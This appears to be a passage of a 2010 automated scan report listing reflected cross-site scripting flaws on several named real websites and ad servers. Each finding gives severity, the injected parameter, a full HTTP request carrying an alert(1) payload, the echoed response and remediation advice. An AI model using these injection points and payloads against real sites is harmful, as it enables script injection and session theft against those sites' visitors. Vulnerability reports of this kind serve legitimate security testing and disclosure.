Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/designers2dcfe"-alert(1)-"f8935cb4790 HTTP/1.1
Host: www.myshape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=RLQRVMSweb1CKIIK; path=/
Date: Sun, 28 Nov 2010 01:59:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.10
Set-Cookie: id=45bp8o4gl368qut7mdssv2cc44; expires=Wed, 08-Dec-2010 01:59:21 GMT; path=/; domain=.myshape.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22249

<!DOCTYPE html>
<html>
   <head>
           <title>MyShape 404 Oops</title>
       <meta name="keywords" content="" />
       <meta name="description" content="MyShape 404 Oops" />
       <meta http-equiv="X-UA-Compatible
...[SNIP]...
<script>
   var CURRENT_APP="/shop",
       CURRENT_MODULE="/tiger",
       CURRENT_COMMAND="/designers2dcfe"-alert(1)-"f8935cb4790";
   </script>
...[SNIP]...

1.15. http://www.thesundaytimes.co.uk/sto/public/ [sectionUniqueName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thesundaytimes.co.uk
Path:   /sto/public/

Issue detail

The value of the sectionUniqueName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6546"><script>alert(1)</script>91e7dbc88ee was submitted in the sectionUniqueName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /sto/public/?service=sectionmenu&sectionUniqueName=stylef6546"><script>alert(1)</script>91e7dbc88ee HTTP/1.1
Host: www.thesundaytimes.co.uk
Proxy-Connection: keep-alive
Referer: http://www.thesundaytimes.co.uk/sto/
Origin: http://www.thesundaytimes.co.uk
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_visit%3D1%7C1290914345100%3B%20s_nr%3D1290912545110%7C1293504545110%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cmm%3DDirect%2520Load%3B%20s_sq%3D%3B%20s_sv_sid%3D693384141524%3B; s_sv_122_p1=1@10@s/2422&e/2; s_sv_122_s1=1@16@a//1290912545660; rsi_segs=J05530_11488&J05530_11512
Content-Length: 0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ws: gilcda34a
X-ws: stocda34a
Content-Type: text/html;charset=UTF-8
Content-Length: 293
Vary: Accept-Encoding
Cache-Control: max-age=60
Date: Sun, 28 Nov 2010 02:06:43 GMT
Connection: close
Set-Cookie: JSESSIONID=C3141FBF7973B6483C3D8FEF16559C7B; Path=/sto

<div class="dropdown-content stylef6546"><script>alert(1)</script>91e7dbc88ee">
<div class="section-index">
<h3>
<img src="" width="" height="14" alt=" Section" title=" Section" />
</h3>
<div class="a
...[SNIP]...

1.16. https://www.timesplus.co.uk/iam/app/logout [targetURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.timesplus.co.uk
Path:   /iam/app/logout

Issue detail

The value of the targetURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0826'%3balert(1)//424263f6066 was submitted in the targetURL parameter. This input was echoed as d0826';alert(1)//424263f6066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iam/app/logout?targetURL=http://www.thesundaytimes.co.uk/sto/d0826'%3balert(1)//424263f6066 HTTP/1.1
Host: www.timesplus.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=J05530_11488&J05530_11512&J05530_11513; JSESSIONID=CD1F7F4E5E002B77D98B83325DBC5C54; s_pers=%20s_nr%3D1290472206024%7C1293064206024%3B%20s_visit%3D1%7C1290914410170%3B; BIGipServergilcda-ui=530381967.20480.0000; s_sess=%20s_cc%3Dtrue%3B%20s_cmm%3DDirect%2520Load%3B%20s_sq%3D%3B;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ws: gilcda13a
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 28 Nov 2010 02:06:56 GMT
Content-Length: 501
Connection: close
Set-Cookie: JSESSIONID=5197EF3304C21E0DAD15CC2F98D637C2; Path=/iam
Cache-Control: no-store,no-cache,must-revalidate
Expires: 0
Pragma: no-cache

<script src="http://www.thetimes.co.uk/iam/app/logout?time=2010-11-28 02:06:56.168"></script>
<script src="http://www.thesundaytimes.co.uk/iam/app/logout?time=2010-11-28 02:06:56.168"></script>
<scr
...[SNIP]...
<script>window.location='http://www.thesundaytimes.co.uk/sto/d0826';alert(1)//424263f6066'</script>
...[SNIP]...

1.17. http://www.smarter.com/se--qq-london%2Btimes%2Bdress.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smarter.com
Path:   /se--qq-london%2Btimes%2Bdress.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b8c1"-alert(1)-"a2544a32560 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se--qq-london%2Btimes%2Bdress.html HTTP/1.1
Host: www.smarter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4b8c1"-alert(1)-"a2544a32560

Response

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2010 01:59:32 GMT
Server: Apache
Loader-Time-Used: 0.00023
Set-Cookie: __mmsid=a6e87c8afe073b4a0dec1b8539c1e6fe; path=/; domain=.smarter.com
Set-Cookie: __mmspn=deleted; expires=Sat, 28-Nov-2009 01:59:31 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmoff=deleted; expires=Sat, 28-Nov-2009 01:59:31 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmuid=b3fc361a972ac4d599fb960e96430ca3; expires=Sat, 28-Nov-2015 01:59:32 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmtrk=0|||20|297a886780277d1ba497dcb9d55b674a; path=/; domain=.smarter.com
Set-Cookie: qry_lnk=deleted; expires=Sat, 28-Nov-2009 01:59:31 GMT; path=/; domain=.smarter.com
Set-Cookie: qry_ctxt=deleted; expires=Sat, 28-Nov-2009 01:59:31 GMT; path=/; domain=.smarter.com
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 135738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> London Times Dress
...[SNIP]...
s)+e;
};
SMUS_GO.fileServer = "http://files.smarter.com/";
var fileServer = "http://files.smarter.com/";
var wwwServer = "http://www.smarter.com/";
var referUrl = "http://www.google.com/search?hl=en&q=4b8c1"-alert(1)-"a2544a32560";
var keyWord = "london times dress";
var onlySdc = "";
var sourceGroup = "";
var PageBn="0"; //bn value
var PerPage="30"; // per page num
</script>
...[SNIP]...

1.18. http://b.collective-media.net/cmadj/bzo.361/L3_4985265 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.collective-media.net
Path:   /cmadj/bzo.361/L3_4985265

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3df1'%3balert(1)//4c960797330 was submitted in the cli cookie. This input was echoed as a3df1';alert(1)//4c960797330 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.361/L3_4985265 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9da3df1'%3balert(1)//4c960797330; nadp=1; targ=1; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 28 Nov 2010 02:00:04 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7085

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-91806842_1290909604","http://ad.doubleclick.net//bzo.361/L3_4985265;net=bzo;u=,bzo-91806842_1290909604,11bbcecf1d09b9da3df1';alert(1)//4c960797330,none,;;contx=none;dc=d;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

1.19. http://optimized-by.rubiconproject.com/a/7753/12919/23787-15.js [ruid cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7753/12919/23787-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58158"-alert(1)-"58761997d83 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7753/12919/23787-15.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; csi30=3173073.js^1^1290909423^1290909423&3173350.js^1^1290909416^1290909416; put_2100=usr3fee54cfd1776401; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; csi9=3158230.js^1^1290745020^1290745020; put_1185=7574652266400145248; au=GG8K86FH-LAEM-10.244.194.4; khaos=GGTZ6NWQ-D-2XOG; put_1197=3200630513076977442; rdk15=0; rpb=5576%3D1%263632%3D1%265421%3D1%264970%3D1%265872%3D1%265884%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%262189%3D1%262111%3D1%262374%3D1%263750%3D1%264939%3D1%264894%3D1%264222%3D1%265671%3D1%264214%3D1%264940%3D1%264210%3D1%264554%3D1%266073%3D1%265319%3D1%264212%3D1; ruid=58158"-alert(1)-"58761997d83; rdk=7753/12919; csi2=3159917.js^1^1290745695^1290745695&3161127.js^1^1290745692^1290745692&3176053.js^5^1290745622^1290745671&3161996.js^1^1290745600^1290745600; put_1523=1769dabbde2879da2a63bdcbd17f2a94; csi15=3175934.js^2^1290472289^1290472293&3165012.js^1^1290472131^1290472131&3151969.js^2^1290472102^1290472130&3179882.js^3^1290471074^1290471936&3151966.js^1^1290471571^1290471571&3152311.js^2^1290469846^1290470815&3151251.js^1^1290470489^1290470489&3178849.js^1^1290470485^1290470485&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; put_1994=cdes03xfgoce; cd=false;

Response

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2010 02:00:19 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7753/12919; expires=Sun, 28-Nov-2010 03:00:19 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 28-Nov-2010 03:00:19 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=9
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2657

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3161645"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=58158"-alert(1)-"58761997d83\" width=\"1\" height=\"1\" />
...[SNIP]...

Report generated by XSS.CX at Sat Nov 27 21:03:18 CST 2010.